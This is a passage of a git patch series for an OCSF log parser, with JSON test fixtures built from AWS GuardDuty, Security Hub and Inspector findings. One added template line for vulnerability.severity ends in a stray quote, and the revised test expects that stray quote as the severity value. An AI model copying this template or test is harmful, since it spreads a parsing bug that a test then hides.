 OCSF/ocsf/ingest/parser.yml                   | 36 ++++++++++++-------
 OCSF/ocsf/tests/test_detection_finding_2.json | 34 ++++++++++++++++++
 .../tests/test_vulnerability_finding_1.json   | 20 ++---------
 4 files changed, 65 insertions(+), 30 deletions(-)
 create mode 100644 OCSF/ocsf/tests/test_detection_finding_2.json

diff --git a/OCSF/ocsf/_meta/fields.yml b/OCSF/ocsf/_meta/fields.yml
index 081424c29..1205bf0ae 100644
--- a/OCSF/ocsf/_meta/fields.yml
+++ b/OCSF/ocsf/_meta/fields.yml
@@ -20,6 +20,11 @@ ocsf.class_uid:
   name: ocsf.class_uid
   type: long
 
+ocsf.vulnerabilities:
+  description: ''
+  name: ocsf.vulnerabilities
+  type: array
+
 process.group.id:
   description: ''
   name: process.group.id
diff --git a/OCSF/ocsf/ingest/parser.yml b/OCSF/ocsf/ingest/parser.yml
index d63d70d8d..05a84c0b4 100644
--- a/OCSF/ocsf/ingest/parser.yml
+++ b/OCSF/ocsf/ingest/parser.yml
@@ -879,19 +879,29 @@ stages:
           event.reason: "{{parse_event.message.finding.title}}"
 
       - set:
-          vulnerability.id: >
-            [{%- for item in parse_event.message.vulnerabilities -%}'{{item.cve.uid}}',{%- endfor -%}]
-          vulnerability.score.version: >
-            [{%- for item in parse_event.message.vulnerabilities -%}'{{item.cve.cvss.version}}',{%- endfor -%}]
-          vulnerability.description: >
-            [{%- for item in parse_event.message.vulnerabilities -%}'{{item.desc}}',{%- endfor -%}]
-          vulnerability.score.base: >
-            [{%- for item in parse_event.message.vulnerabilities -%}'{{item.cve.cvss.base_score | float}}',{%- endfor -%}]
-          vulnerability.severity: >
-            [{%- for item in parse_event.message.vulnerabilities -%}'{{item.severity}}',{%- endfor -%}]
-          vulnerability.scanner.vendor: >
-            [{%- for item in parse_event.message.vulnerabilities -%}'{{item.vendor_name}}',{%- endfor -%}]
-        filter: "{{parse_event.message.vulnerabilities != null}}"
+          vulnerability.id: "{{parse_event.message.vulnerabilities[0].cve.uid}}"
+          vulnerability.score.version: "{{parse_event.message.vulnerabilities[0].cve.cvss.version}}"
+          vulnerability.description: "{{parse_event.message.vulnerabilities[0].desc}}"
+          vulnerability.score.base: "{{parse_event.message.vulnerabilities[0].cve.cvss.base_score | float}}"
+          vulnerability.severity: "{{parse_event.message.vulnerabilities[0].severity}}'"
+          vulnerability.scanner.vendor: "{{parse_event.message.vulnerabilities[0].vendor_name}}"
+        filter: "{{parse_event.message.get('vulnerabilities', []) | length > 0}}"
+
+      - set:
+          ocsf.vulnerabilities: >
+            [
+                {%- for item in parse_event.message.vulnerabilities -%}
+                {
+                  'id': '{{item.cve.uuid}}',
+                  'version': '{{item.cve.cvss.version}}',
+                  'description': '{{item.desc}}',
+                  'score': {'base': {{item.cve.cvss.base_score | float}} },
+                  'severity': '{{item.severity}}',
+                  'scanner': {'vendor': '{{item.vendor_name}}'},
+                },
+                {%- endfor -%}
+            ]
+        filter: "{{parse_event.message.get('vulnerabilities', []) | length > 1}}"
 
   pipeline_category_identity_and_access_management:
     actions:
diff --git a/OCSF/ocsf/tests/test_detection_finding_2.json b/OCSF/ocsf/tests/test_detection_finding_2.json
new file mode 100644
index 000000000..cecfab8d5
--- /dev/null
+++ b/OCSF/ocsf/tests/test_detection_finding_2.json
@@ -0,0 +1,34 @@
+{
+  "input": {
+    "message": "{\"metadata\":{\"log_version\":\"2018-10-08\",\"product\":{\"feature\":{\"uid\":\"arn:aws:guardduty:eu-west-3:11111111111:detector/effff3292fef47a8b2941836e434e833\",\"name\":null},\"uid\":\"arn:aws:securityhub:eu-west-3::product/aws/guardduty\",\"name\":\"GuardDuty\",\"vendor_name\":\"Amazon\",\"version\":null},\"processed_time_dt\":1726062303537,\"profiles\":[\"cloud\",\"datetime\",\"linux\"],\"version\":\"1.1.0\",\"extensions\":[{\"name\":\"linux\",\"uid\":\"1\",\"version\":\"1.1.0\"}]},\"time\":1726062281022,\"time_dt\":1726062281022,\"confidence_score\":null,\"message\":null,\"cloud\":{\"account\":{\"uid\":\"11111111111\"},\"region\":\"eu-west-3\",\"provider\":\"AWS\"},\"resource\":null,\"finding_info\":{\"created_time_dt\":1681218428211,\"uid\":\"arn:aws:guardduty:eu-west-3:11111111111:detector/effff3292fef47a8b2941836e434e833/finding/9711517f14c54eb79ad3e3b0cee89e3c\",\"desc\":\"The API DescribeStackEvents was invoked using root credentials from IP address 62.129.18.152.\",\"title\":\"The API DescribeStackEvents was invoked using root credentials.\",\"modified_time_dt\":1726062281022,\"first_seen_time_dt\":1681218080000,\"last_seen_time_dt\":1726061921000,\"related_events\":null,\"types\":[\"TTPs/Policy:IAMUser-RootCredentialUsage\"],\"src_url\":\"https://eu-west-3.console.aws.amazon.com/guardduty/home?region=eu-west-3#/findings?macros=current&fId=9711517f14c54eb79ad3e3b0cee89e3c\"},\"remediation\":null,\"compliance\":null,\"vulnerabilities\":null,\"resources\":[{\"type\":\"AwsIamAccessKey\",\"uid\":\"AWS::IAM::AccessKey:********************\",\"cloud_partition\":\"aws\",\"region\":\"eu-west-3\",\"labels\":null,\"data\":\"{\\\"AwsIamAccessKey\\\":{\\\"PrincipalId\\\":\\\"11111111111\\\",\\\"PrincipalName\\\":\\\"Root\\\",\\\"PrincipalType\\\":\\\"Root\\\"}}\",\"criticality\":null,\"owner\":null}],\"evidences\":[{\"data\":\"\",\"actor\":null,\"process\":null,\"api\":{\"operation\":\"DescribeStackEvents\",\"response\":null,\"service\":{\"name\":\"cloudformation.amazonaws.com\"}},\"src_endpoint\":{\"ip\":\"1.2.3.4\",\"location\":{\"country\":\"France\",\"city\":\"Rennes\",\"coordinates\":[-1.6744,48.110001]},\"port\":null},\"connection_info\":null,\"dst_endpoint\":null,\"query\":null}],\"class_name\":\"Detection Finding\",\"class_uid\":2004,\"category_name\":\"Findings\",\"category_uid\":2,\"severity_id\":2,\"severity\":\"Low\",\"activity_name\":\"Update\",\"activity_id\":2,\"type_uid\":200402,\"type_name\":\"Detection Finding: Update\",\"status\":\"New\",\"accountid\":null,\"region\":null,\"asl_version\":null,\"observables\":[{\"name\":\"resources[].uid\",\"value\":\"AWS::IAM::AccessKey:********************\",\"type\":\"Resource UID\",\"type_id\":10},{\"name\":\"evidences[].src_endpoint.ip\",\"value\":\"1.2.3.4\",\"type\":\"IP Address\",\"type_id\":2}]}\n",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "OCSF",
+        "dialect_uuid": "a9c959ac-78ec-47a4-924e-8156a77cebf5"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\"metadata\":{\"log_version\":\"2018-10-08\",\"product\":{\"feature\":{\"uid\":\"arn:aws:guardduty:eu-west-3:11111111111:detector/effff3292fef47a8b2941836e434e833\",\"name\":null},\"uid\":\"arn:aws:securityhub:eu-west-3::product/aws/guardduty\",\"name\":\"GuardDuty\",\"vendor_name\":\"Amazon\",\"version\":null},\"processed_time_dt\":1726062303537,\"profiles\":[\"cloud\",\"datetime\",\"linux\"],\"version\":\"1.1.0\",\"extensions\":[{\"name\":\"linux\",\"uid\":\"1\",\"version\":\"1.1.0\"}]},\"time\":1726062281022,\"time_dt\":1726062281022,\"confidence_score\":null,\"message\":null,\"cloud\":{\"account\":{\"uid\":\"11111111111\"},\"region\":\"eu-west-3\",\"provider\":\"AWS\"},\"resource\":null,\"finding_info\":{\"created_time_dt\":1681218428211,\"uid\":\"arn:aws:guardduty:eu-west-3:11111111111:detector/effff3292fef47a8b2941836e434e833/finding/9711517f14c54eb79ad3e3b0cee89e3c\",\"desc\":\"The API DescribeStackEvents was invoked using root credentials from IP address 62.129.18.152.\",\"title\":\"The API DescribeStackEvents was invoked using root credentials.\",\"modified_time_dt\":1726062281022,\"first_seen_time_dt\":1681218080000,\"last_seen_time_dt\":1726061921000,\"related_events\":null,\"types\":[\"TTPs/Policy:IAMUser-RootCredentialUsage\"],\"src_url\":\"https://eu-west-3.console.aws.amazon.com/guardduty/home?region=eu-west-3#/findings?macros=current&fId=9711517f14c54eb79ad3e3b0cee89e3c\"},\"remediation\":null,\"compliance\":null,\"vulnerabilities\":null,\"resources\":[{\"type\":\"AwsIamAccessKey\",\"uid\":\"AWS::IAM::AccessKey:********************\",\"cloud_partition\":\"aws\",\"region\":\"eu-west-3\",\"labels\":null,\"data\":\"{\\\"AwsIamAccessKey\\\":{\\\"PrincipalId\\\":\\\"11111111111\\\",\\\"PrincipalName\\\":\\\"Root\\\",\\\"PrincipalType\\\":\\\"Root\\\"}}\",\"criticality\":null,\"owner\":null}],\"evidences\":[{\"data\":\"\",\"actor\":null,\"process\":null,\"api\":{\"operation\":\"DescribeStackEvents\",\"response\":null,\"service\":{\"name\":\"cloudformation.amazonaws.com\"}},\"src_endpoint\":{\"ip\":\"1.2.3.4\",\"location\":{\"country\":\"France\",\"city\":\"Rennes\",\"coordinates\":[-1.6744,48.110001]},\"port\":null},\"connection_info\":null,\"dst_endpoint\":null,\"query\":null}],\"class_name\":\"Detection Finding\",\"class_uid\":2004,\"category_name\":\"Findings\",\"category_uid\":2,\"severity_id\":2,\"severity\":\"Low\",\"activity_name\":\"Update\",\"activity_id\":2,\"type_uid\":200402,\"type_name\":\"Detection Finding: Update\",\"status\":\"New\",\"accountid\":null,\"region\":null,\"asl_version\":null,\"observables\":[{\"name\":\"resources[].uid\",\"value\":\"AWS::IAM::AccessKey:********************\",\"type\":\"Resource UID\",\"type_id\":10},{\"name\":\"evidences[].src_endpoint.ip\",\"value\":\"1.2.3.4\",\"type\":\"IP Address\",\"type_id\":2}]}\n",
+    "event": {
+      "action": "update",
+      "category": [],
+      "severity": 2,
+      "type": []
+    },
+    "@timestamp": "2024-09-11T13:44:41.022000Z",
+    "cloud": {
+      "account": {
+        "id": "11111111111"
+      },
+      "provider": "AWS",
+      "region": "eu-west-3"
+    },
+    "ocsf": {
+      "activity_id": 2,
+      "activity_name": "Update",
+      "class_name": "Detection Finding",
+      "class_uid": 2004
+    }
+  }
+}
\ No newline at end of file
diff --git a/OCSF/ocsf/tests/test_vulnerability_finding_1.json b/OCSF/ocsf/tests/test_vulnerability_finding_1.json
index 89ec9b0a7..ddc18e5c4 100644
--- a/OCSF/ocsf/tests/test_vulnerability_finding_1.json
+++ b/OCSF/ocsf/tests/test_vulnerability_finding_1.json
@@ -25,25 +25,11 @@
       "class_uid": 2002
     },
     "vulnerability": {
-      "description": [
-        ""
-      ],
-      "id": [
-        "CVE-2023-1255"
-      ],
+      "id": "CVE-2023-1255",
       "scanner": {
-        "vendor": [
-          "NVD"
-        ]
+        "vendor": "NVD"
       },
-      "score": {
-        "version": [
-          ""
-        ]
-      },
-      "severity": [
-        ""
-      ]
+      "severity": "'"
     }
   }
 }
\ No newline at end of file

From 1bf39df5324008451a5b6bc69e70d19a4aa00d7c Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Mon, 16 Sep 2024 17:23:59 +0200
Subject: [PATCH 033/317] fix(OCSF): add event.category and event.type for
 findings

---
 OCSF/ocsf/ingest/parser.yml                       | 3 ++-
 OCSF/ocsf/tests/test_compliance_finding_1.json    | 8 ++++++--
 OCSF/ocsf/tests/test_detection_finding_1.json     | 8 ++++++--
 OCSF/ocsf/tests/test_detection_finding_2.json     | 8 ++++++--
 OCSF/ocsf/tests/test_vulnerability_finding_1.json | 8 ++++++--
 5 files changed, 26 insertions(+), 9 deletions(-)

diff --git a/OCSF/ocsf/ingest/parser.yml b/OCSF/ocsf/ingest/parser.yml
index 05a84c0b4..6a711a8ba 100644
--- a/OCSF/ocsf/ingest/parser.yml
+++ b/OCSF/ocsf/ingest/parser.yml
@@ -166,6 +166,7 @@ stages:
             [
               {%- if parse_event.message.class_uid == 2001 and parse_event.message.malware != null -%}'malware',{%- endif -%}
               {%- if parse_event.message.class_uid == 2001 and parse_event.message.vulnerabilities != null -%}'vulnerability',{%- endif -%}
+              {%- if parse_event.message.class_uid in [2002, 2003, 2004, 2005, 2006] -%}'vulnerability',{%- endif -%}
               {%- if parse_event.message.class_uid in [3001, 3005, 3006] -%}'iam',{%- endif -%}
               {%- if parse_event.message.class_uid == 3002 -%}'authentication',{%- endif -%}
               {%- if parse_event.message.class_uid == 3003 -%}'session',{%- endif -%}
@@ -185,7 +186,7 @@ stages:
       - set:
           event.type: >
             [
-              {%- if parse_event.message.class_uid in [1001,1002,1003,1007,2001,3001,3002,3003,3005,3006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,5001,5002,6002,6003,6004] -%}'info',{%- endif -%}
+              {%- if parse_event.message.class_uid in [1001,1002,1003,1007,2001,2002,2003,2004,2005,2006,3001,3002,3003,3005,3006,4001,4002,4003,4004,4005,4006,4007,4008,4009,4010,4011,4012,5001,5002,6002,6003,6004] -%}'info',{%- endif -%}
               {%- if parse_event.message.class_uid in [3001, 3006] -%}'user',{%- endif -%}
               {%- if parse_event.message.class_uid in [3005] -%}'group',{%- endif -%}
               {%- if parse_event.message.class_uid in [4003,4004,4005,4007,4008] -%}'protocol',{%- endif -%}
diff --git a/OCSF/ocsf/tests/test_compliance_finding_1.json b/OCSF/ocsf/tests/test_compliance_finding_1.json
index 5b2f713c5..f897afe21 100644
--- a/OCSF/ocsf/tests/test_compliance_finding_1.json
+++ b/OCSF/ocsf/tests/test_compliance_finding_1.json
@@ -6,9 +6,13 @@
     "message": "{\"activity_id\": 2, \"activity_name\": \"Update\", \"category_name\": \"Findings\", \"category_uid\": 2, \"class_name\": \"Compliance Finding\", \"class_uid\": 2003, \"cloud\": {\"account\": {\"uid\": \"111111111111\"}, \"provider\": \"AWS\", \"region\": \"us-east-2\"}, \"compliance\": {\"control\": \"Config.1\", \"requirements\": [\"PCI DSS 10.5.2\", \"PCI DSS 11.5\"], \"standards\": [\"standards/pci-dss/v/3.2.1\"], \"status\": \"FAILED\"}, \"finding_info\": {\"created_time_dt\": \"2023-01-13T15:08:44.967-05:00\", \"desc\": \"This AWS control checks whether AWS Config is enabled in current account and region.\", \"first_seen_time_dt\": \"2023-01-13T15:08:44.967-05:00\", \"last_seen_time_dt\": \"2023-07-21T14:12:05.693-04:00\", \"modified_time_dt\": \"2023-07-21T14:11:53.060-04:00\", \"title\": \"PCI.Config.1 AWS Config should be enabled\", \"types\": [\"Software and Configuration Checks/Industry and Regulatory Standards/PCI-DSS\"], \"uid\": \"arn:aws:securityhub:us-east-2:111111111111:subscription/pci-dss/v/3.2.1/PCI.Config.1/finding/7d619054-6f0d-456b-aa75-23b20f74fae6\"}, \"metadata\": {\"log_version\": \"2018-10-08\", \"processed_time_dt\": \"2023-07-21T14:12:08.489-04:00\", \"product\": {\"feature\": {\"uid\": \"pci-dss/v/3.2.1/PCI.Config.1\"}, \"name\": \"Security Hub\", \"uid\": \"arn:aws:securityhub:us-east-2::product/aws/securityhub\", \"vendor_name\": \"AWS\"}, \"profiles\": [\"cloud\", \"datetime\"], \"version\": \"1.1.0\"}, \"observables\": [{\"name\": \"resource.uid\", \"type\": \"Resource UID\", \"type_id\": 10, \"value\": \"AWS::::Account:111111111111\"}], \"remediation\": {\"desc\": \"For information on how to correct this issue, consult the AWS Security Hub controls documentation.\", \"references\": [\"https://docs.aws.amazon.com/console/securityhub/Config.1/remediation\"]}, \"resource\": {\"cloud_partition\": \"aws\", \"region\": \"us-east-2\", \"type\": \"AwsAccount\", \"uid\": \"AWS::::Account:111111111111\"}, \"severity\": \"Medium\", \"severity_id\": 3, \"status\": \"New\", \"time\": 1689963113060, \"time_dt\": \"2023-07-21T14:11:53.060-04:00\", \"type_name\": \"Compliance Finding: Update\", \"type_uid\": 200302, \"unmapped\": {\"FindingProviderFields.Severity.Label\": \"MEDIUM\", \"FindingProviderFields.Severity.Original\": \"MEDIUM\", \"FindingProviderFields.Types[]\": \"Software and Configuration Checks/Industry and Regulatory Standards/PCI-DSS\", \"ProductFields.ControlId\": \"PCI.Config.1\", \"ProductFields.RecommendationUrl\": \"https://docs.aws.amazon.com/console/securityhub/Config.1/remediation\", \"ProductFields.Resources:0/Id\": \"arn:aws:iam::111111111111:root\", \"ProductFields.StandardsArn\": \"arn:aws:securityhub:::standards/pci-dss/v/3.2.1\", \"ProductFields.StandardsControlArn\": \"arn:aws:securityhub:us-east-2:111111111111:control/pci-dss/v/3.2.1/PCI.Config.1\", \"ProductFields.StandardsSubscriptionArn\": \"arn:aws:securityhub:us-east-2:111111111111:subscription/pci-dss/v/3.2.1\", \"ProductFields.aws/securityhub/CompanyName\": \"AWS\", \"ProductFields.aws/securityhub/FindingId\": \"arn:aws:securityhub:us-east-2::product/aws/securityhub/arn:aws:securityhub:us-east-2:111111111111:subscription/pci-dss/v/3.2.1/PCI.Config.1/finding/7d619054-6f0d-456b-aa75-23b20f74fae6\", \"ProductFields.aws/securityhub/ProductName\": \"Security Hub\", \"RecordState\": \"ACTIVE\", \"Severity.Normalized\": \"40\", \"Severity.Original\": \"MEDIUM\", \"Severity.Product\": \"40\", \"WorkflowState\": \"NEW\"}}",
     "event": {
       "action": "update",
-      "category": [],
+      "category": [
+        "vulnerability"
+      ],
       "severity": 3,
-      "type": []
+      "type": [
+        "info"
+      ]
     },
     "@timestamp": "2023-07-21T18:11:53.060000Z",
     "cloud": {
diff --git a/OCSF/ocsf/tests/test_detection_finding_1.json b/OCSF/ocsf/tests/test_detection_finding_1.json
index 15c53b791..4099501c1 100644
--- a/OCSF/ocsf/tests/test_detection_finding_1.json
+++ b/OCSF/ocsf/tests/test_detection_finding_1.json
@@ -6,9 +6,13 @@
     "message": "{\"activity_id\": 1, \"activity_name\": \"Create\", \"category_name\": \"Findings\", \"category_uid\": 2, \"class_name\": \"Detection Finding\", \"class_uid\": 2004, \"cloud\": {\"account\": {\"uid\": \"111111111111\"}, \"provider\": \"AWS\", \"region\": \"us-east-2\"}, \"evidences\": [{\"api\": {\"operation\": \"DeleteTrail\", \"service\": {\"name\": \"cloudtrail.amazonaws.com\"}}, \"data\": \"\", \"src_endpoint\": {\"ip\": \"52.94.133.131\", \"location\": {\"city\": \"\", \"coordinates\": [-100.821999, 37.751], \"country\": \"United States\"}}}], \"finding_info\": {\"created_time_dt\": \"2023-09-19T11:05:22.487-04:00\", \"desc\": \"AWS CloudTrail trail arn:aws:cloudtrail:us-east-2:111111111111:trail/delete-me was disabled by Admin calling DeleteTrail under unusual circumstances. This can be attackers attempt to cover their tracks by eliminating any trace of activity performed while they accessed your account.\", \"first_seen_time_dt\": \"2023-09-19T10:55:09.000-04:00\", \"last_seen_time_dt\": \"2023-09-19T10:55:09.000-04:00\", \"modified_time_dt\": \"2023-09-19T11:05:22.487-04:00\", \"src_url\": \"https://us-east-2.console.aws.amazon.com/guardduty/home?region=us-east-2#/findings?macros=current&fId=a6c556fcbc9bea427a19f8b787099a0b\", \"title\": \"AWS CloudTrail trail arn:aws:cloudtrail:us-east-2:111111111111:trail/delete-me was disabled.\", \"types\": [\"TTPs/Defense Evasion/Stealth:IAMUser-CloudTrailLoggingDisabled\"], \"uid\": \"arn:aws:guardduty:us-east-2:111111111111:detector/1ac1bfceda6679698215d5d0EXAMPLE/finding/a6c556fcbc9bea427a19f8b787099a0b\"}, \"metadata\": {\"extensions\": [{\"name\": \"linux\", \"uid\": \"1\", \"version\": \"1.1.0\"}], \"log_version\": \"2018-10-08\", \"product\": {\"feature\": {\"uid\": \"arn:aws:guardduty:us-east-2:111111111111:detector/1ac1bfceda6679698215d5d0EXAMPLE\"}, \"name\": \"GuardDuty\", \"uid\": \"arn:aws:securityhub:us-east-2::product/aws/guardduty\", \"vendor_name\": \"Amazon\"}, \"profiles\": [\"cloud\", \"datetime\", \"linux\"], \"version\": \"1.1.0\"}, \"observables\": [{\"name\": \"evidences[].src_endpoint.ip\", \"type\": \"IP Address\", \"type_id\": 2, \"value\": \"52.94.133.131\"}, {\"name\": \"resources[].uid\", \"type\": \"Resource UID\", \"type_id\": 10, \"value\": \"AWS::IAM::AccessKey:ASIATMJPC7EXAMPLE\"}], \"resources\": [{\"cloud_partition\": \"aws\", \"data\": \"{\\\"AwsIamAccessKey\\\":{\\\"PrincipalId\\\":\\\"AROATMJPC7YEXAMPLE:example\\\",\\\"PrincipalName\\\":\\\"Admin\\\",\\\"PrincipalType\\\":\\\"AssumedRole\\\"}}\", \"region\": \"us-east-2\", \"type\": \"AwsIamAccessKey\", \"uid\": \"AWS::IAM::AccessKey:ASIATMJPC7EXAMPLE\"}], \"severity\": \"Low\", \"severity_id\": 2, \"status\": \"New\", \"time\": 1695135922487, \"time_dt\": \"2023-09-19T11:05:22.487-04:00\", \"type_name\": \"Detection Finding: Create\", \"type_uid\": 200401, \"unmapped\": {\"FindingProviderFields.Severity.Label\": \"LOW\", \"FindingProviderFields.Types[]\": \"TTPs/Defense Evasion/Stealth:IAMUser-CloudTrailLoggingDisabled\", \"ProductFields.aws/guardduty/service/action/actionType\": \"AWS_API_CALL\", \"ProductFields.aws/guardduty/service/action/awsApiCallAction/affectedResources/AWS::CloudTrail::Trail\": \"arn:aws:cloudtrail:us-east-2:111111111111:trail/delete-me\", \"ProductFields.aws/guardduty/service/action/awsApiCallAction/callerType\": \"Remote IP\", \"ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/asn\": \"16509\", \"ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/asnOrg\": \"AMAZON-02\", \"ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/isp\": \"Amazon Office\", \"ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/org\": \"Amazon Office\", \"ProductFields.aws/guardduty/service/additionalInfo/type\": \"default\", \"ProductFields.aws/guardduty/service/archived\": \"false\", \"ProductFields.aws/guardduty/service/count\": \"1\", \"ProductFields.aws/guardduty/service/detectorId\": \"1ac1bfceda6679698215d5d0EXAMPLE\", \"ProductFields.aws/guardduty/service/eventFirstSeen\": \"2023-09-19T14:55:09.000Z\", \"ProductFields.aws/guardduty/service/eventLastSeen\": \"2023-09-19T14:55:09.000Z\", \"ProductFields.aws/guardduty/service/resourceRole\": \"TARGET\", \"ProductFields.aws/guardduty/service/serviceName\": \"guardduty\", \"ProductFields.aws/securityhub/CompanyName\": \"Amazon\", \"ProductFields.aws/securityhub/FindingId\": \"arn:aws:securityhub:us-east-2::product/aws/guardduty/arn:aws:guardduty:us-east-2:111111111111:detector/1ac1bfceda6679698215d5d0EXAMPLE/finding/a6c556fcbc9bea427a19f8b787099a0b\", \"ProductFields.aws/securityhub/ProductName\": \"GuardDuty\", \"RecordState\": \"ACTIVE\", \"Sample\": \"false\", \"Severity.Normalized\": \"40\", \"Severity.Product\": \"2\", \"WorkflowState\": \"NEW\"}}",
     "event": {
       "action": "create",
-      "category": [],
+      "category": [
+        "vulnerability"
+      ],
       "severity": 2,
-      "type": []
+      "type": [
+        "info"
+      ]
     },
     "@timestamp": "2023-09-19T15:05:22.487000Z",
     "cloud": {
diff --git a/OCSF/ocsf/tests/test_detection_finding_2.json b/OCSF/ocsf/tests/test_detection_finding_2.json
index cecfab8d5..2f37b29b8 100644
--- a/OCSF/ocsf/tests/test_detection_finding_2.json
+++ b/OCSF/ocsf/tests/test_detection_finding_2.json
@@ -12,9 +12,13 @@
     "message": "{\"metadata\":{\"log_version\":\"2018-10-08\",\"product\":{\"feature\":{\"uid\":\"arn:aws:guardduty:eu-west-3:11111111111:detector/effff3292fef47a8b2941836e434e833\",\"name\":null},\"uid\":\"arn:aws:securityhub:eu-west-3::product/aws/guardduty\",\"name\":\"GuardDuty\",\"vendor_name\":\"Amazon\",\"version\":null},\"processed_time_dt\":1726062303537,\"profiles\":[\"cloud\",\"datetime\",\"linux\"],\"version\":\"1.1.0\",\"extensions\":[{\"name\":\"linux\",\"uid\":\"1\",\"version\":\"1.1.0\"}]},\"time\":1726062281022,\"time_dt\":1726062281022,\"confidence_score\":null,\"message\":null,\"cloud\":{\"account\":{\"uid\":\"11111111111\"},\"region\":\"eu-west-3\",\"provider\":\"AWS\"},\"resource\":null,\"finding_info\":{\"created_time_dt\":1681218428211,\"uid\":\"arn:aws:guardduty:eu-west-3:11111111111:detector/effff3292fef47a8b2941836e434e833/finding/9711517f14c54eb79ad3e3b0cee89e3c\",\"desc\":\"The API DescribeStackEvents was invoked using root credentials from IP address 62.129.18.152.\",\"title\":\"The API DescribeStackEvents was invoked using root credentials.\",\"modified_time_dt\":1726062281022,\"first_seen_time_dt\":1681218080000,\"last_seen_time_dt\":1726061921000,\"related_events\":null,\"types\":[\"TTPs/Policy:IAMUser-RootCredentialUsage\"],\"src_url\":\"https://eu-west-3.console.aws.amazon.com/guardduty/home?region=eu-west-3#/findings?macros=current&fId=9711517f14c54eb79ad3e3b0cee89e3c\"},\"remediation\":null,\"compliance\":null,\"vulnerabilities\":null,\"resources\":[{\"type\":\"AwsIamAccessKey\",\"uid\":\"AWS::IAM::AccessKey:********************\",\"cloud_partition\":\"aws\",\"region\":\"eu-west-3\",\"labels\":null,\"data\":\"{\\\"AwsIamAccessKey\\\":{\\\"PrincipalId\\\":\\\"11111111111\\\",\\\"PrincipalName\\\":\\\"Root\\\",\\\"PrincipalType\\\":\\\"Root\\\"}}\",\"criticality\":null,\"owner\":null}],\"evidences\":[{\"data\":\"\",\"actor\":null,\"process\":null,\"api\":{\"operation\":\"DescribeStackEvents\",\"response\":null,\"service\":{\"name\":\"cloudformation.amazonaws.com\"}},\"src_endpoint\":{\"ip\":\"1.2.3.4\",\"location\":{\"country\":\"France\",\"city\":\"Rennes\",\"coordinates\":[-1.6744,48.110001]},\"port\":null},\"connection_info\":null,\"dst_endpoint\":null,\"query\":null}],\"class_name\":\"Detection Finding\",\"class_uid\":2004,\"category_name\":\"Findings\",\"category_uid\":2,\"severity_id\":2,\"severity\":\"Low\",\"activity_name\":\"Update\",\"activity_id\":2,\"type_uid\":200402,\"type_name\":\"Detection Finding: Update\",\"status\":\"New\",\"accountid\":null,\"region\":null,\"asl_version\":null,\"observables\":[{\"name\":\"resources[].uid\",\"value\":\"AWS::IAM::AccessKey:********************\",\"type\":\"Resource UID\",\"type_id\":10},{\"name\":\"evidences[].src_endpoint.ip\",\"value\":\"1.2.3.4\",\"type\":\"IP Address\",\"type_id\":2}]}\n",
     "event": {
       "action": "update",
-      "category": [],
+      "category": [
+        "vulnerability"
+      ],
       "severity": 2,
-      "type": []
+      "type": [
+        "info"
+      ]
     },
     "@timestamp": "2024-09-11T13:44:41.022000Z",
     "cloud": {
diff --git a/OCSF/ocsf/tests/test_vulnerability_finding_1.json b/OCSF/ocsf/tests/test_vulnerability_finding_1.json
index ddc18e5c4..47b46332d 100644
--- a/OCSF/ocsf/tests/test_vulnerability_finding_1.json
+++ b/OCSF/ocsf/tests/test_vulnerability_finding_1.json
@@ -6,9 +6,13 @@
     "message": "{\"activity_id\": 2, \"activity_name\": \"Update\", \"category_name\": \"Findings\", \"category_uid\": 2, \"class_name\": \"Vulnerability Finding\", \"class_uid\": 2002, \"cloud\": {\"account\": {\"uid\": \"111111111111\"}, \"provider\": \"AWS\", \"region\": \"us-east-2\"}, \"finding_info\": {\"created_time_dt\": \"2023-04-21T11:59:04.000-04:00\", \"desc\": \"Issue summary: The AES-XTS cipher decryption implementation for 64 bit ARM\\nplatform contains a bug that could cause it to read past the input buffer,\\nleading to a crash.\\n\\nImpact summary: Applications that use the AES-XTS algorithm on the 64 bit ARM\\nplatform can crash in rare circumstances. The AES-XTS algorithm is usually\\nused for disk encryption.\\n\\nThe AES-XTS cipher decryption implementation for 64 bit ARM platform will read\\npast the end of the ciphertext buffer if the ciphertext size is 4 mod 5 in 16\\nbyte blocks, e.g. 144 bytes or 1024 bytes. If the memory after the ciphertext\\nbuffer is unmapped, this will trigger a crash which results in a denial of\\nservice.\\n\\nIf an attacker can control the size and location of the ciphertext buffer\\nbeing decrypted by an application using AES-XTS on 64 bit ARM, the\\napplication is affected. This is fairly unlikely making this issue\\na Low severity one.\", \"first_seen_time_dt\": \"2023-04-21T11:59:04.000-04:00\", \"last_seen_time_dt\": \"2024-01-26T17:19:14.000-05:00\", \"modified_time_dt\": \"2024-01-26T17:19:14.000-05:00\", \"title\": \"CVE-2023-1255 - openssl\", \"types\": [\"Software and Configuration Checks/Vulnerabilities/CVE\"], \"uid\": \"arn:aws:inspector2:us-east-2:111111111111:finding/faa0d54609b94871badcc83ac7c2add5\"}, \"metadata\": {\"log_version\": \"2018-10-08\", \"processed_time_dt\": \"2024-01-26T17:59:56.923-05:00\", \"product\": {\"feature\": {\"uid\": \"AWSInspector\"}, \"name\": \"Inspector\", \"uid\": \"arn:aws:securityhub:us-east-2::product/aws/inspector\", \"vendor_name\": \"Amazon\", \"version\": \"2\"}, \"profiles\": [\"cloud\", \"datetime\"], \"version\": \"1.1.0\"}, \"observables\": [{\"name\": \"resource.uid\", \"type\": \"Resource UID\", \"type_id\": 10, \"value\": \"arn:aws:ecr:us-east-2:111111111111:repository/browserhostingstack-EXAMPLE-btb1o54yh1jr/sha256:e9e2afad74f4e80511a5cff33d3d989b9797a718425f27e549f5b1f862c058a8\"}], \"resource\": {\"cloud_partition\": \"aws\", \"data\": \"{\\\"AwsEcrContainerImage\\\":{\\\"Architecture\\\":\\\"amd64\\\",\\\"ImageDigest\\\":\\\"sha256:e9e2afad74f4e80511a5cff33d3d989b9797a718425f27e549f5b1f862c058a8\\\",\\\"ImagePublishedAt\\\":\\\"2023-04-11T21:07:55Z\\\",\\\"RegistryId\\\":\\\"111111111111\\\",\\\"RepositoryName\\\":\\\"browserhostingstack-EXAMPLE-btb1o54yh1jr\\\"}}\", \"region\": \"us-east-2\", \"type\": \"AwsEcrContainerImage\", \"uid\": 